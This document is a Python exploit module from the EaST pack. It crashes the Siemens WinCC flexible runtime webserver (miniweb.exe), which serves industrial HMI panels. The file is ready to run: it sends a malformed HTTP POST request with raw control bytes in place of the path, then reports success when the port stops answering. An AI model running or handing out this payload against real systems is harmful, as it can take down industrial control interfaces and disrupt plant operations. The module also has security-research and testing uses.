#!/usr/bin/env python
# The exploit is a part of EaST pack - use only under the license agreement
# specified in LICENSE.txt in your EaST distribution
import sys
import time
import socket
sys.path.append("./core")
from Sploit import Sploit
# Module metadata (presumably displayed/indexed by the EaST framework).
# All strings are kept verbatim, including the original wording; "CVE Name"
# is "?" because no CVE identifier is recorded for this issue here.
INFO = {
    'NAME': "ef_wincc_miniweb_dos",
    'DESCRIPTION': "Siemens WINCC flixible runtime 2008 SP2 + SP 1, miniweb.exe Denial of Service",
    'VENDOR': "http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx",
    "CVE Name": "?",
    "NOTES": """
Reference --> http://aluigi.altervista.org/adv/winccflex_1-adv.txt section E]
Form vendor:
WinCC flexible is ideal for use as a Human Machine Interface (HMI) in
any machine or process-level application in plant, machine and
series-machine construction. WinCC flexible is designed for all sectors
of industry and offers engineering software for all SIMATIC HMI
operator panels, from the smallest Micro Panel to the Multi Panel, as
well as runtime visualization software for PC-based single-user systems
running under Windows XP / Windows 7.
miniweb.exe is a small webserver that listens on 80 and 443 ports by
default.
miniweb.exe is affected by a vulnerability that allows an attacker to
crash the server while it handle the HTTP POST request.
ag_wincc_miniwebdos.py allowing attackers to crash the miniweb.exe
Tested against Siemens WINCC flixible runtime 2008 SP2 + SP 1, WinXP Sp3 Eng.
""",
    'CHANGELOG': "18 Aug, 2015. Written by Gleg team.",
    'PATH': 'Exploits/',
}
# Must be in every module, to be set by framework
# Default option values; the framework may override them before run().
# PORT is deliberately a string here -- exploit.args() converts it with int().
OPTIONS = {
    "HOST": "127.0.0.1",
    "PORT": "80",
}
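class exploit(Sploit):
    """Siemens WinCC flexible miniweb.exe denial-of-service module.

    A single HTTP POST request with a garbage request-target (see
    ``makesploit``) is sent to the target; per the referenced advisory in
    INFO["NOTES"] the server fails while handling such a request.  After a
    fixed delay, "success" is decided solely by whether the TCP port still
    accepts connections -- there is no fingerprinting and no HTTP-level
    check.  Any other reason the port stops answering (firewall, the host
    going away, a service restart window) is reported exactly the same way,
    so ``run`` first verifies the port was reachable before the attack.
    """

    # Seconds each socket operation may block.  Without a timeout an
    # unreachable or SYN-dropping host hangs the module indefinitely.
    TIMEOUT = 10
    # Seconds to wait after sending the payload before re-probing the port.
    SETTLE_DELAY = 15

    def __init__(self, host = "", port = 0, logger = None):
        """Record the target; HOST/PORT are normally overridden by args()."""
        Sploit.__init__(self, logger = logger)
        self.name = INFO['NAME']
        self.host = host
        self.port = port
        self.ssl = None
        self.state = "running"

    def args(self):
        """Resolve HOST/PORT from the framework options into self.host/self.port.

        NOTE: as in the original module, ``self.args`` is rebound from this
        method to the option mapping returned by ``Sploit.args``; calling
        ``self.args()`` a second time would therefore raise TypeError.
        ``run`` calls it exactly once.
        """
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))

    def _connect(self):
        """Open a TCP connection to (self.host, self.port) with TIMEOUT applied.

        Returns the connected socket; the caller must close it.  Raises
        ``socket.error`` (which also covers ``socket.timeout``) on failure,
        closing the half-built socket first so nothing leaks.
        """
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client.settimeout(self.TIMEOUT)
        try:
            client.connect((self.host, self.port))
        except socket.error:
            client.close()
            raise
        return client

    def chk(self):
        """Probe whether the target port still accepts TCP connections.

        Returns 1 when the connection attempt fails (interpreted as the
        service being down) and 0 when it succeeds.  Only the TCP accept is
        tested, so a listening-but-wedged miniweb.exe still reads as alive,
        and a refused/timed-out connection for unrelated reasons reads as
        down -- the reason is logged to help tell those apart.
        """
        try:
            client = self._connect()
        except socket.error as err:
            self.log("check reported no open socket")
            self.log("connect error: {}".format(err))
            return 1
        client.close()
        self.log("check reported that service is steel alive")
        return 0

    def makesploit(self):
        """Return the request that triggers the miniweb.exe crash.

        The request-target of the POST line is a run of non-ASCII/control
        bytes instead of a path.  A bytes literal is used so ``sendall``
        receives raw bytes on Python 3 as well; on Python 2 it is identical
        to the original str literal.
        """
        return b'POST \xfa\x01\x01\x01\x45\x40\x40\x41 HTTP/1.0\r\n\r\n'

    def run(self):
        """Send the payload and report success if the port stops answering.

        Returns 1 on apparent success, 0 otherwise, and always calls
        ``finish`` with the matching boolean.  Only socket errors are
        handled here; anything else is a bug in the module and propagates.
        """
        self.args()
        self.log("Attacking {}".format(self.host))
        # Pre-flight: a port that was never reachable would otherwise be
        # reported as a successful DoS by the post-attack check.
        if self.chk():
            self.log("target not reachable before attack, aborting")
            self.finish(False)
            return 0
        try:
            client = self._connect()
            try:
                client.sendall(self.makesploit())
            finally:
                client.close()
        except socket.error as err:
            self.log("failed!")
            self.log("socket error: {}".format(err))
            self.finish(False)
            return 0
        self.log('Data sent')
        time.sleep(self.SETTLE_DELAY)
        self.log('Check target')
        if self.chk():
            self.finish(True)
            return 1
        self.finish(False)
        return 0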
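if __name__ == '__main__':
    # Only "tool mode" exists for now: the module is meant to be driven by
    # the EaST framework (Sploit), and run from here it gets no logger and
    # whatever HOST/PORT exploit.args() resolves from OPTIONS.  print() with
    # a single argument behaves the same under Python 2 and Python 3.
    print("Running exploit %s .. " % INFO['NAME'])
    e = exploit('', 80)
    e.run()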